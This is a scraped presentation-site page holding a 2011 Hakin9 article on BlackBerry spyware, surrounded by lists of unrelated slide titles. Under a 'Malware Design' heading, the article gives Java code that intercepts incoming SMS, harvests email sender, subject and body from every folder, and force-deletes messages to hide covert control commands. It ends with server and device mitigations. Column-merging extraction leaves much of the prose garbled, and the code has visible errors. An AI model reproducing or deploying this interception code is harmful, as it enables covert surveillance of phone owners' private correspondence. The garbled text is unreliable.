Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????blackmambaettijean
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 

Kürzlich hochgeladen (20)

Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 

The Backroom Message That’s Stolen Your Deal

  • 1.
  • 2. ATTACK The Backroom Message That’s Stolen Your Deal Do you want to learn more about bigwig? Is someone keeping secrets from you? Need to silently record text messages, GPS locations and call info of your child or employee? Catch everybody at whatever you like with our unique service. What you will learn… What you should know… • Each email-message (or sms-message) as part term of busi- • Basic knowledge about BlackBerry security ness correspondence could be intercept • Message can activate spyware I t lets you to intercept SMS or Email messages via the might just be that your partner is planning a surprise Internet, catch cheating wives or cheating husbands, for you and has enlisted their help, so check the stop employee espionage, protect children, etc. number carefully, particularly if it seems familiar to Well, you’ve just read yet another advertising that you. summarized several spyware products for every mobile OS. To be beyond exception that Windows Mobile, Nothing personal... Symbian, iOS (iPhone) are the most popular with Everyone knows that reading other people’s letters consumer. All of kind has never had a distinct security or diaries, without the permission of the author isn’t policy. But the BlackBerry devices are one of world’s ethical. All personal correspondence, or even just top devices! It’s entirely explicable, though. There’s information such as SMS messages, address book, unique thing is defensible. It has a proof-of-security email, ICQ history, indeed are called for fashionable flow channel to transmit data from each to other. And word Privacy, or a Private, Data Privacy. Any attempt to up to now, there’s no successful decoder for ciphered cheat with it behind author back is a direct violation of technology. the individual privacy. These days a lot of people are in use of a mobile One day, everyone has thought about what men phone, it has made our lives easier and increased write to each other, or what was written by his friend or communication, in spite of opportunity for a cheating. colleagues. It’s no necessarily malicious intent. Do they You suppose your lover isn’t being faithful to you and have something to hide, to hatch a plot? Omnivorous you ought to grant your suspicions or allay your fears. curiosity is one of the most popular human vice helps So, the main of evidence can be new lover is linked with to fraudster to earn considerable sums of money every your partner. day. They always ready to help to get into somebody Telltale signs will be sms to the same number, late address phone book, email message or social at night or early in the morning or both, if the same networking pages for all comers. After all do you can number is appearing as a call at unsocial hours get access to cherished friend’s (lover’s, boss, foes) then you really have something to be concerned chats? about. However there can be a perfectly innocent The victim’s mobile phone is coveted human’s goal. explanation for activity like this and its worth pausing This storage place may shed light on wrapped in before jumping to conclusions. If the number that is mystery things. There’s no way to read others emails appearing is that of a family member or good friend it or sms. You can take phone and read all you interested 22 04/2011
  • 3. The backroom message that’s stolen your deal in. It’s one of the easiest ways to do. By the way, you Routines behind the screen... may to provoke your victim into allowing acquainting The message (sms or email) intercept is a great yourself with privacy data. It should be noted that lack opportunity to take control of somebody and be invisible. of knowledge is leading topics of the hour. Now the You’re able to read emails as well as make a telephone plot thickens in call for a vote of confidence! Really, directory (subscriber’s list) through the text messages to how long does software ask you to grant with privacy a minute. Such kind of message intercept is in demand data? Do you trust software with yourself secrets? on the situation. Moreover, it’s a real ability to feel a spy Take some kind of program modifying sms&email likewise to obtain information that can’t be get in a legal graphical controls, for instance. When you’re going to way. Some years ago such intercepts were a science install it you’ve been asking to set access permission fiction available for intelligence service. Up to now, you (as general permission), send&receive permission, don’t be secret serviceman; you don’t have a high level etc. of experience. The explanation was quite simple. You There is no reason for concern in this case, right? only need to hit him with your legacy hammer. There’s You install what you like despite expectancy of data no way of misapplication of hummer, isn’t it? You can stealing. If we take a Facebook application (or twitter hammer a nail into board, or you also can hammer application) then confidence level should be reduced a nail into smb head. There is nothing reprehensible because such kind of apps has http/https via EDGE/ about it. The public tranquillity as protectability is wrong 3G/WiFi as common channel to data transmission. side of vulnerability. And vice versa. Further to there’s ability to receive actual information about new friends or upload status by sms sending. Malware Design For some time past, internet spreads a spam with Ultimate goal is show what API-routines help us to design a proposal to use the service to read others’ posts. such malware. List of API classes is shall be import to re- Kaspersky Lab reported about one of these viruses create sms listener is presented in Listing 1. in February, 2009. Users are promised the ability to The first public class Date represents a specific read others SMS. By clicking on the junk link users instant in time, with millisecond precision. downloaded a Trojan called Trojan.Win32.Agent2.dbq (Kaspersky Lab’s Notation). Listing 1. API-routines to design malware's part “sms The next secret (cherished) zone area is a personal intercept” email storage. Email correspondence goes mad not less than others sms. Deceivers are offering java.util.Date; password email account’s breaking services. At javax.wireless.messaging.MessageConnection; first, they also ask for upfront payment via SMS and javax.wireless.messaging.Message; never break into account. There’s another kind of deception. Someone imparts news about security Listing 2. Retrieve the message holes of Google email system or Yahoo email system and offers to get the password from any mailbox. MessageConnection sms_connection = (MessageConnectio There is a need for you to send to the referred above n)Connector.open("sms://:0"); ; email address your (!) password and answer for Message sms_message = sms_connection.receive(); secret question (what’s your favourite colour?). It Date sms_date = sms_message.getTimestamp(); accounts for by cheating the email system (Google, String sms_address = sms_message.getAddress(); Yahoo). After all, you’ll supposedly receive a list of String sms_body = null; password to any email system. Come again! It’s easy if (m instanceof TextMessage) substitution of your account’s password for desired { password. So, there’s no fraud! Really, there are a lot TextMessage temp_text = (TextMessage)sms_message; of security holes (but it’s just a one kind of it); really, sms_body = temp_text.getPayloadText(); there’s a way to steal password. Are ready to name } this hole? Nobody but you! The email address in else if (m instance of BinaryMessage) received message is just an intruder email account. { This way he gets other’s password. Also he doesn’t byte[] temp_byte = ((BinaryMessage) sms_message). want anyone to confide in. getPayloadData(); Thus, all proposals for access to others’ // convert Binary Data to Text correspondence have two goals. Trick the user out of sms_body = new String(temp_byte, "UTF-8"); money or infect user’s computer with a virus. In this } case, the attacker could also capture the user’s own password. www.hakin9.org/en 23
  • 4. ATTACK Interface Message is the base interface for derived The MessageConnection interface defines the basic interfaces that represent various types of messages. functionality for sending and receiving messages. It This interface contains the functionality common to all contains methods for sending and receiving messages. messages. We have a couple routines here. The receive() subroutine which receives a message. If there are no messages for this MessageConnection • getAddress() – Returns the address associated with waiting, this method will block until either a message this message. If this is a message to be sent, then for this Connection is received or the MessageConnection this address is the recipient’s address. If this is a is closed. message that has been received, then this address When an incoming message arrives, the notifyIncom is the sender’s address. ingMessage(MessageConnection) method is called. There’s • getTimestamp() – Returns the timestamp indicating a the same method for outcoming message notifyOut when this message has been sent. comingMessage(MessageConnection) that is called when an SMS message is sent from the device. Both of methods Listing 3. API-routines to design malware's part “email are called once for each incoming message to the intercept” MessageConnection. The second malware part is designed to catch email import net.rim.blackberry.api.mail.Address; messages. In this case, It should be used another import net.rim.blackberry.api.mail.Folder; signed routine set which is described in Listing 3. import net.rim.blackberry.api.mail.Message; import net.rim.blackberry.api.mail.Session; Folder INTEGER Constants import net.rim.blackberry.api.mail.Store; • DELETED – A Folder containing deleted messages. • DRAFT – A Folder containing draft messages. Listing 4. Retrieve a email message” • FILED – Contains items that are �led in a Folder. • INBOX – A Folder containing received messages. Session current_session = Session.getDefaultInstan • INVALID – A Folder containing items marked as invalid. • JUNK – A Folder for junk mail. ce(); • OTHER – A Folder that the user created – a personal String folders_name = null; folder. String email_from = null; • OUTBOX – A Folder containing messages in the process of String email_subject = null; being sent. String email_body = null; • SENT – A Folder containing sent messages. • UNFILED – Contains items that are not currently �led in a if (current_session != null) Folder. { Store current_storage = current_ session.getStore(); The Session class provides access to email services, Folder[] flist = current_storage.list(); storage, and transport. for (int i = 0; i < flist.length; i++) The Message class represents an email message. { A message contains a set of header fields (attributes) folders_name = folder.getFullName(); and a body (contents). Messages in a folder also have //get folder's name a set of flags that describe its state within the folder. Message[] msgs = flist[i].getMessages(); Received messages are retrieved from a folder named for (int n=0; n < msgs.length; n++) INBOX (see Folder integer constants). { The Folder class represents a mailbox folder on Address from = msgs[n].getFrom(); the handheld. To retrieve a list of contained folders if (from != null) only call Folder.list(). But we don’t need anything about folder’s contants or system folder’s names, If email_from = from.getAddr(); we need to extract folder’s name it should routine’s } called by getFullName(). By the way, it’s simple to use a email_subject = msgs[n].getSubject(); cycle for (int i = 0; i < email_folder_list.length; i++) email_body = msgs[n].getBodyText(); because we’ve already got email’s folder list by calling } Folder.list(). } The Message class represents a message store and } its access protocol, for storing and retrieving messages on the handheld. To retrieve a Store instance to access message storage on this device we need to invoke Session.getStore(). 24 04/2011
  • 5. The backroom message that’s stolen your deal Refers to code above I notice that I rewrite 4 strings’ objects: folders_name, email_from, email_subject, email_body. To data acquisition you should use the Vector object like „Vector data_acq = new Vector() from java.util.Vector and then create a String object by Utils.makeStringFrom Vector converting data. By the way, you also can use a StringBuilder. Stolen messages from blackberry device Sender :: InternetSMS Body :: http://www.blackberryseeker.com/applications/download/ PDF-To-Go-V20_2.aspx Sender :: InternetSMS Body :: http://letitbit.net/download/.../Defcon14-V64-X30n-Black jacking_Owning_the_enterprise.m4v.html Puppet theatre Progress is interesting to watch. It is in every area of human activity, else it vanishes from sight. The Figure 1. Application Management cybercrime is beyond exception, too. It rapidly improves which is used by his own inhabitants. The malware 2.0 The most interesting subclass is Backdoor and Trojan- is a new word in the IT Security vocabulary since 2006. DDoS ”. The second subclass will be attended to article This term describes the new generation of malicious later on. And now we discuss a backdoor’s behavior. software because it well co-ordinated and well- Well, Backdoors are designed to give malicious users functioning system. By the way, it poisons anti-viruses remote control over an infected computer. So, it’s existence. similar to many administration systems designed and Trojans are malicious programs that perform actions distributed by software developers. These types of which are not authorized by the user: they delete, block, malicious programs make it possible to do anything modify or copy data, and they disrupt the performance the intruder wants on the infected handheld: send of computers or computer networks. Unlike viruses and and receive files, launch files or delete them, display worms, the threats that fall into this category are unable messages, delete data, etc. The programs in this to make copies of themselves or self-replicate. Trojans category are often used in order to unite a group of are classified according to the type of action they victim computers and form a botnet or zombie network. perform on an infected computer. This subclass includes This gives malicious users centralized control over an the following behaviors according to Kaspersky Lab: army of infected computers which can then be used for criminal purposes. • Backdoor • Exploit • Rootkit • Trojan-DDoS • Trojan-Downloader • Trojan-Proxy • Trojan-SMS • Trojan-Spy, etc Listing 5. Delete a email message” Import net.rim.blackberry.api.mail.Folder … Message[] emailMessage= emailFolder.getMessages(); for(int i=0;i<emailMessage.length;i++) { emailFolder.deleteMessage(emailMessage[i],true); } Figure 2. Set application’s permission www.hakin9.org/en 25
  • 6. ATTACK Unfortunately, RIM API does not allow to access already received/sent sms-messages. In spite of it, it still possible to mask our control command to the some kind of spam, e.g. +323232 User MegaFriend has sent message to you. Isn’t it a Facebook notify? It doesn’t matter much that such sms has another sender number; it’s a matter that your device have been received a control message. Mitigation BlackBerry Enterprise Server has several to mitigation. First, you can turn on confirmation of each sending message for cases that blackberry Trojan has ability to spend money and you have to pay the bill. This rule is placed in IT Policy>Common Policy Group>Confirm On Send. If you even set it into True value this rule exerts an impact only on user’s actions. In other words, any kind of program has never notified you when sends Figure 3. Firewall Management message. It also could set a trusted applications in Application Control>Message Access. One more a Most popular message’s control is sms (or mms). radical solution consist in disabling SMS and MMS SMS advantage is rapid access, steadiness, reliability on IT Policy>Device Only Items>Allow SMS and “IT assurance. In BlackBerry’s case email is a second Policy>Common>Disable MMS. The first feature may sufficient channel is capable of the same rapidly moving be set in False state, and the second may be set into events. The way how to catch sms or email messages True value. I discuss above. So, if we’re going to create powerful More powerful way is to create a trusted domain. command control system (further CC) we need know This ability provides us to fill a white list with trusted how to delete this message. Below is part of the codes senders and recipients and to filter a black list as way to delete all the email (see Listing 5). of phrases, senders, recipients. First of all, you The boolean value .deleteMessage(...,true) indicates should check and turn on your BES filter’s status: IT force deletion If the message is marked as saved. Policy>Security>Firewall Block Incoming Messages. If you’ve just caught an email message by using Here it should be checked a SMS, MMS, Enterprise FolderEvent(Folder folder, int type, Message message) Message as filtered types. Enterprise Message is with synchronized void messagesAdded(FolderEvent event) { none of than a enterprise email messages. After it, Message msg = e.getMessage(); } then you can delete it by fill a whitelist in IT Policy>Security>Firewall White List msg.deleteMessage(...). Address with e.g. *@blackberry.enterprise.com. Take Figure 4. Exception’s of black list Figure 5. Adding new exception 26 04/2011
  • 7. The backroom message that’s stolen your deal On the ‘Net • http://docs.blackberry.com/en/admin/deliverables/12063/BlackBerry_Enterprise_Server-Policy_Reference_Guide-T323212-832026- 1023123101-001-5.0.1-US.pdf – BlackBerry Enterprise Server Version: 5.0. Policy Reference Guide, RIM, • http://docs.blackberry.com/en/developers/deliverables/11961/BlackBerry_Java_Application-Feature_and_Technical_Overview-- 789336-1109112514-001-5.0_Beta-US.pdf – BlackBerry Java Application. Version: 5.0. Feature and Technical Overview, RIM • http://docs.blackberry.com/en/developers/deliverables/9091/JDE_5.0_FundamentalsGuide_Beta.pdf – BlackBerry Java Application. Version: 5.0. Fundamentals Guide , RIM, • http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/8067/645045/8655/8656/1106255/BlackBerry_ Application_Developer_Guide_Volume_1.pdf?nodeid=1106256&vernum=0 – BlackBerry Application Developer Guide Volume 1: Fundamentals (4.1), RIM, • http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/8067/645045/8655/8656/1106255/BlackBerry_ Application_Developer_Guide_Volume_2.pdf?nodeid=1106444&vernum=0 – BlackBerry Application Developer Guide Volume 2: Advanced Topics (4.1), RIM, • http://www.blackberry.com/developers/docs/4.2api/ – RIM Device Java Library – 4.2.0 Release (Javadoc), RIM, • http://docs.blackberry.com/en/developers/deliverables/15497/BlackBerry_Smartphone_Simulator-Development_Guide--1001926- 0406042642-001-5.0-US.pdf – BlackBerry Smartphone Simulator. Version: 5.0. Development Guide, RIM, • http://docs.blackberry.com/en/developers/deliverables/1077/BlackBerry_Signing_Authority_Tool_1.0_-_Password_Based_-_ Administrator_Guide.pdf – BlackBerry Signature Tool 1.0. Developer Guide, RIM notice of using a substitution characters like asterisk of spyware extend well beyond simple monitoring. It’s “*”. You also can add another values separated with designed to spy what you’re doing on your device. comma. First step is done, you’ve just create a trusted They collect information about Web pages you usually domain filled with only white addresses. visit, your Internet surfing habits and messages you The second step is filling black tags. First of all, you exchange. It also interfere with user control of the should turn option, too. The rule IT Policy>Filter Rule> computer in other ways, such as installing additional Condition and Action>Enabled is set into True state software and redirecting Web browser activity or theft switches to strain your emails. The second rule IT of personal information (including financial information Policy>Filter Rule>Condition and Action>From gives such as credit card numbers). opportunity to vanish message from unknown senders. Then it sends without your knowledge to others. Here you can type something like stealer@gmail.com, However, to install they have to hide themselves in hacker@yahoo.com. The same rule IT Policy>Filter demo games as example. The presence of spyware Rule>Condition and Action>Sent To can filter is typically hidden from the user, and can be difficult vulnerable message that can include stolen data to to detect. It’s not very common, it’s not an amount of intruder account or non-trusted account. To control viruses, Trojans, backdoors that antiviruses can stop, transfer subjects and bodies set unallowable phrases and otherwise everybody will know it. Like many recent to following rules: IT Policy>Filter Rule>Condition and viruses, however, spyware by design spyware exploits Action>Subject, IT Policy>Filter Rule>Condition and infected computers for commercial gain. Action>Body. After it, you have to check a last rule Even you think your information isn’t important to that indicate way of delivering black messages. In first intruder, they can use your device resources again case, device is receiving only headers, in second case others or steal data won’t never let you know about it. BES holding such messages don’t allow to device By the way, they foul the trail and left your device (and download it. you) holding the baby. If you are BIS consumer you always check permissions when downloading an application to grant or disallow status to email or sms. Or you can set it after you downloaded application in Options>Device>Applic YURY CHEMERKIN ation Management>Edit Permissions. To fill a white list Graduated at Russian State University for the Humanities with enabling a device firewall you should to follow Op (http://rggu.com/) in 2010. At present postgraduate at RSUH. tions>Security>Firewall, check desirable features and Information Security Analyst since 2009 and currently works add white rule. as mobile info security researcher in Moscow. E-mail: yury.chemerkin@gmail.com. Conclusion Facebook: http://www.facebook.com/people/Yury-Chemerkin/ Spyware is one of the most common types of malware. 100001827345335. While the term spyware suggests software that LinkedIn: http://ru.linkedin.com/pub/yury-chemerkin/2a/434/ secretly monitors the user’s computing, the functions 549 www.hakin9.org/en 27